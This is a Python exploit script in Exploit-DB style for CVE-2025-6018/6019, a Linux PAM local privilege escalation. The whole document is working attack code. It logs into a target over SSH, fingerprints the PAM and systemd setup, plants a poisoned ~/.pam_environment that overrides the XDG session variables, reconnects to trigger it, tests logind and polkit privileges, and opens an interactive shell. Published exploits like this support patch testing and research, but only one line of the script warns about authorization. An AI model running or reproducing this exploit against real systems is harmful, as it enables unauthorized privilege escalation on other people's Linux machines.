# Exploit Title: Linux PAM Environment - Variable Injection Local Privilege Escalation # Exploit Author: @Ä°brahimsql # Exploit Author's github: https://github.com/ibrahmsql # Description: PAM pam_env.so module allows environment variable injection via ~/.pam_environment # leading to privilege escalation through SystemD session manipulation # CVE: CVE-2025-6018, CVE-2025-6019 # Vendor Homepage: https://github.com/linux-pam/linux-pam # Software Link: https://github.com/linux-pam/linux-pam/releases # Version: PAM 1.3.0 - 1.6.0 (vulnerable versions) # Category: Local Privilege Escalation # Requirements: paramiko>=2.12.0 # Usage: python3 cve_2025_6018_professional.py -i target_ip -u username -p password # References: # - https://access.redhat.com/security/cve/CVE-2025-6018 # - https://bugzilla.redhat.com/show_bug.cgi?id=2372693 # - https://bugzilla.suse.com/show_bug.cgi?id=1243226 import paramiko import time import sys import socket import argparse import logging from datetime import datetime # Setup logging logging.basicConfig( level=logging.INFO, format='%(asctime)s [%(levelname)s] %(message)s', datefmt='%Y-%m-%d %H:%M:%S', handlers=[ logging.FileHandler('cve_2025_6018_exploit.log'), logging.StreamHandler(sys.stdout) ] ) logger = logging.getLogger(__name__) class CVEExploit: def __init__(self): self.vulnerable_versions = [ "pam-1.3.0", "pam-1.3.1", "pam-1.4.0", "pam-1.5.0", "pam-1.5.1", "pam-1.5.2", "pam-1.5.3", "pam-1.6.0" ] def check_vulnerability(self, client): """Enhanced vulnerability detection""" logger.info("Starting vulnerability assessment") checks = { "pam_version": "rpm -q pam || dpkg -l | grep libpam", "pam_env": "find /etc/pam.d/ -name '*' -exec grep -l 'pam_env' {} \\; 2>/dev/null", "pam_systemd": "find /etc/pam.d/ -name '*' -exec grep -l 'pam_systemd' {} \\; 2>/dev/null", "systemd_version": "systemctl --version | head -1" } vulnerable = False for check_name, command in checks.items(): logger.info(f"Executing check: {check_name}") try: stdin, stdout, stderr = client.exec_command(command, timeout=10) output = stdout.read().decode().strip() if check_name == "pam_version": for vuln_ver in self.vulnerable_versions: if vuln_ver in output: logger.info(f"Vulnerable PAM version detected: {vuln_ver}") vulnerable = True break elif check_name == "pam_env" and output: logger.info("pam_env.so configuration found") vulnerable = True elif check_name == "pam_systemd" and output: logger.info("pam_systemd.so found - escalation vector available") if output and check_name != "pam_version": logger.debug(f"Command output: {output[:100]}...") except Exception as e: logger.warning(f"Check {check_name} failed: {e}") time.sleep(0.5) return vulnerable def create_malicious_environment(self, client): """Create enhanced .pam_environment file""" logger.info("Creating malicious environment file") payload = '''# CVE-2025-6018 Environment Poisoning XDG_SEAT OVERRIDE=seat0 XDG_VTNR OVERRIDE=1 XDG_SESSION_TYPE OVERRIDE=x11 XDG_SESSION_CLASS OVERRIDE=user XDG_RUNTIME_DIR OVERRIDE=/tmp/runtime SYSTEMD_LOG_LEVEL OVERRIDE=debug''' try: logger.info("Writing .pam_environment file") cmd = f"cat > ~/.pam_environment << 'EOF'\n{payload}\nEOF" stdin, stdout, stderr = client.exec_command(cmd) # Verify creation stdin, stdout, stderr = client.exec_command("cat ~/.pam_environment") output = stdout.read().decode() if "OVERRIDE" in output: logger.info("Malicious environment file created successfully") return True else: logger.error("Failed to create environment file") return False except Exception as e: logger.error(f"Environment poisoning failed: {e}") return False def test_privilege_escalation(self, client): """Test privilege escalation vectors""" logger.info("Testing privilege escalation vectors") tests = [ ("SystemD Reboot", "gdbus call --system --dest org.freedesktop.login1 --object-path /org/freedesktop/login1 --method org.freedesktop.login1.Manager.CanReboot", "yes"), ("SystemD Shutdown", "gdbus call --system --dest org.freedesktop.login1 --object-path /org/freedesktop/login1 --method org.freedesktop.login1.Manager.CanPowerOff", "yes"), ("PolicyKit Check", "pkcheck --action-id org.freedesktop.policykit.exec --process $$ 2>/dev/null || echo 'denied'", "authorized") ] escalated = False for test_name, command, success_indicator in tests: logger.info(f"Testing: {test_name}") try: stdin, stdout, stderr = client.exec_command(command, timeout=10) output = stdout.read().decode().strip() if success_indicator in output.lower(): logger.info(f"PRIVILEGE ESCALATION DETECTED: {test_name}") escalated = True else: logger.info(f"No escalation detected: {test_name}") except Exception as e: logger.warning(f"Test {test_name} failed: {e}") return escalated def interactive_shell(self, client): """Professional interactive shell""" logger.info("Starting interactive shell session") shell = client.invoke_shell() shell.send("export PS1='exploit$ '\n") time.sleep(1) # Clear buffer while shell.recv_ready(): shell.recv(1024) print("\n--- Interactive Shell ---") print("Commands: 'exit' to quit, 'status' for privilege check") while True: try: command = input("exploit$ ") if command.lower() == 'exit': break elif command.lower() == 'status': stdin, stdout, stderr = client.exec_command("id && groups") print(stdout.read().decode()) continue shell.send(command + "\n") time.sleep(0.5) while shell.recv_ready(): output = shell.recv(1024).decode('utf-8', errors='ignore') print(output, end='') except KeyboardInterrupt: logger.warning("Use 'exit' to quit properly") except Exception as e: logger.error(f"Shell error: {e}") break def run_exploit(self, hostname, username, password=None, key_filename=None, port=22): """Main exploit execution""" logger.info(f"Starting CVE-2025-6018 exploit against {hostname}:{port}") try: # Initial connection client = paramiko.SSHClient() client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) logger.info(f"Connecting to {hostname}:{port} as {username}") client.connect(hostname, port=port, username=username, password=password, key_filename=key_filename, timeout=10) logger.info("SSH connection established") # Check vulnerability if not self.check_vulnerability(client): logger.error("Target does not appear vulnerable to CVE-2025-6018/6019") return False logger.info("Target appears vulnerable, proceeding with exploitation") # Create malicious environment if not self.create_malicious_environment(client): logger.error("Failed to create malicious environment") return False logger.info("Reconnecting to trigger PAM environment loading") client.close() time.sleep(2) # Reconnect to trigger PAM client = paramiko.SSHClient() client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) client.connect(hostname, port=port, username=username, password=password, key_filename=key_filename) logger.info("Reconnection successful") # Test privilege escalation if self.test_privilege_escalation(client): logger.info("EXPLOITATION SUCCESSFUL - Privilege escalation confirmed") self.interactive_shell(client) else: logger.warning("No clear privilege escalation detected") logger.info("Manual verification may be required") return True except paramiko.AuthenticationException: logger.error("Authentication failed - check credentials") except paramiko.SSHException as e: logger.error(f"SSH error: {e}") except socket.error as e: logger.error(f"Network error: {e}") except Exception as e: logger.error(f"Unexpected error: {e}") finally: try: client.close() except: pass logger.info("Connection closed") return False def main(): parser = argparse.ArgumentParser( description="CVE-2025-6018/6019 PAM Environment Injection Exploit", formatter_class=argparse.RawDescriptionHelpFormatter, epilog=""" Examples: python3 %(prog)s -i 192.168.1.100 -u testuser -p password123 python3 %(prog)s -i target.com -u admin -k ~/.ssh/id_rsa """ ) parser.add_argument("-i", "--hostname", required=True, help="Target hostname or IP") parser.add_argument("-u", "--username", required=True, help="SSH username") parser.add_argument("-p", "--password", help="SSH password") parser.add_argument("-k", "--key", dest="key_filename", help="SSH private key file") parser.add_argument("--port", type=int, default=22, help="SSH port (default: 22)") parser.add_argument("-v", "--verbose", action="store_true", help="Enable verbose logging") args = parser.parse_args() if args.verbose: logging.getLogger().setLevel(logging.DEBUG) if not args.password and not args.key_filename: parser.error("Provide either password (-p) or private key (-k)") # Security warning logger.warning("Use only with proper authorization!") exploit = CVEExploit() success = exploit.run_exploit( hostname=args.hostname, username=args.username, password=args.password, key_filename=args.key_filename, port=args.port ) sys.exit(0 if success else 1) if __name__ == "__main__": main()